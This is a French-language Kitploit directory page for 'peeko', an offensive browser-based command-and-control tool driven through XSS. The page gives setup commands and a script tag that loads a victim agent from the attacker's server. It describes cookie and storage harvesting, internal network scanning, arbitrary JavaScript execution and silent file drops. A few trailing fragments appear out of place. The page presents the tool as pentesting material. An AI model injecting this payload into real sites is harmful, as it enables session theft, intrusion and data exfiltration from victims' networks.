Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
peeko — peeko – Browser-based XSS C2 for stealthy internal network exploration via infected browser. | Kitploit
Outils/GitHubGitHub/b3rito/peeko
ReconnaissanceNetwork MappingPort ScanningLateral MovementWeb Application ExploitationData ExfiltrationInformation GatheringPost-ExploitationPenetration TestingCommand and Control
GitHubb3rito/peeko
230281il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

peeko

peeko – Browser-based XSS C2 for stealthy internal network exploration via infected browser.

Voir le dépôt
Partager

peeko

Version : v1.1

peeko est un outil C2 (Commande et Contrôle) basé sur le navigateur, propulsé par XSS, qui exploite le navigateur de la victime comme un proxy furtif au sein des réseaux internes.

Grâce à une charge utile XSS injectée, peeko établit une connexion WebSocket vers un serveur central, permettant à un attaquant de contrôler à distance le navigateur de la victime pour envoyer des requêtes à des services internes, scanner des réseaux, exfiltrer des données, ou même exécuter du JavaScript arbitraire — le tout sans déposer le moindre binaire.


Fonctionnalités

  • Communication basée sur WebSocket entre l'attaquant et les victimes
  • Le navigateur de la victime récupère des URL internes et scanne des plages IP + ports
  • Panneau de contrôle simple avec :
    • Sélecteur de victime
    • Récupération manuelle d'URL
    • Scanner de plages IP et de ports
    • Exécution de JS personnalisé (manuel ou automatique)
    • Livraison de fichiers (auto/manuelle)
    • Informations navigateur et collecte de jetons (cookies, stockage, etc.)
    • Visionneuse de journaux avec copie/enregistrement en .txt ou .json
  • Support HTTPS avec certificats auto-signés
  • Léger : un seul fichier Python + ressources statiques

Prérequis

  • Python 3.8+
  • OpenSSL
  • Linux/macOS (testé sur des systèmes basés sur Debian)

Démarrage rapide

  1. Clonez le dépôt :

    root@kitploit:~
    git clone https://github.com/b3rito/peeko.git
    cd peeko
    
  2. Installez les dépendances :

    root@kitploit:~
    make install
    
  3. (Facultatif) Rendez les scripts exécutables :

    root@kitploit:~
    chmod +x gen-cert.sh start.sh
    
  4. Générez un certificat TLS auto-signé :

    root@kitploit:~
    make cert
    
  5. Remplacez l'espace réservé SERVER-IP :

    Ouvrez et modifiez les fichiers suivants :

    • static/agent.js
    • static/control.html

    Remplacez SERVER-IP par l'IP/domaine de votre serveur :

    root@kitploit:~
    wss://SERVER-IP:8443/ws → wss://192.168.30.136:8443/ws
    
  6. Démarrez le serveur :

    root@kitploit:~
    make run
    
  7. Ouvrez le panneau de contrôle dans votre navigateur :


Fonctionnalités du panneau de contrôle

Fonctions principales

  • Sélectionner et gérer les victimes connectées
  • Récupérer n'importe quelle URL HTTPS interne/externe via la victime
  • Scanner des plages LAN : 192.168.1.0/24, 10.0.0.10-20, etc.
  • Scanner des ports ou plages spécifiques (ex. 80, 443,8000-8080)

Livraison de fichiers

  • Envoyer des fichiers à la victime (Base64 via WebSocket)
  • Le navigateur de la victime les télécharge automatiquement
  • Prise en charge du téléversement automatique à la connexion

Collecte d'informations

  • Collecter l'User Agent, la plateforme, le référent, les cookies, local/sessionStorage
  • Afficher les résultats en JSON
  • Déclenché manuellement ou collecte automatique à la connexion

Exécution de JS personnalisé

  • Exécuter du JavaScript arbitraire sur le navigateur de la victime
  • Utiliser le format exec:... pour envoyer
  • Prend en charge l'exécution automatique à la connexion
  • Exemple : exec:alert(document.cookie);

Journalisation

  • Tout est journalisé (requêtes, réponses, vidages d'informations)
  • Copier ou exporter les journaux en .txt ou .json
  • Interface minimaliste conçue comme un journal de terminal

Explication du CORS et du contenu mixte

Les politiques des navigateurs modernes affectent ce à quoi peeko peut accéder.

Réponses CORS

En-têtePeut-on lire le contenu ?Remarques
Access-Control-Allow-Origin: *✅Accès complet à la réponse
Aucun en-tête⚠️La réponse est opaque

Contenu mixte

La victime se connecte en HTTPS. Si une cible scannée n'utilise que HTTP :

  • Le navigateur bloquera les requêtes de contenu mixte
  • peeko ne peut pas lire depuis des points de terminaison http://
  • Privilégiez toujours les cibles utilisant HTTPS lors des scans

En pratique

Lors d'un test d'intrusion, si vous trouvez un service interne qui répond avec Access-Control-Allow-Origin: * et qui est servi en HTTPS, alors peeko devient un proxy furtif capable d'exfiltrer des données internes directement depuis le navigateur de la victime, sans déposer de fichiers ni ouvrir de connexions sortantes.


Structure du projet

root@kitploit:~
peeko/
├── main.py             → FastAPI WebSocket server  
├── start.sh            → Launch server  
├── gen-cert.sh         → Generate self-signed TLS certificate  
├── Makefile            → Install/run helpers  
├── requirements.txt    → Python dependencies  
├── certs/              → TLS key and cert will be stored here  
└── static/             → Browser client assets  
    ├── control.html    → Control panel (was attacker.html)  
    ├── infect.html     → Victim landing page  
    └── agent.js        → Victim agent script  

Workflow

  1. L'attaquant injecte le XSS (via une vulnérabilité stockée ou réfléchie)
  2. Le navigateur de la victime se connecte via WebSocket au serveur peeko
  3. Le panneau de contrôle permet à l'attaquant :
    • de scanner le réseau
    • de récupérer des URL
    • de vider les cookies, le stockage
    • d'exécuter du JS arbitraire
    • d'exfiltrer les réponses
    • de déposer des fichiers

Cas d'utilisation

  • Cartographie du réseau interne via XSS
  • Pivotement basé sur le navigateur
  • Livraison silencieuse de fichiers / dropper JS

Avertissement

Cet outil est fourni uniquement à des fins éducatives et de tests autorisés.
Toute utilisation de peeko en dehors d'environnements où vous disposez d'une autorisation explicite est strictement interdite.
Vous êtes responsable de vos propres actions.


Auteurs

Écrit par b3rito de mes3hacklab et GioPpeTto

Télécharger l’outil
root@kitploit:~
https://192.168.30.136:8443/static/control.html
  • Injectez l'agent (exemple XSS) :

    root@kitploit:~
    <script src="https://192.168.30.136:8443/static/agent.js"></script>
    
  • Origine restreinte❌Bloquée ou illisible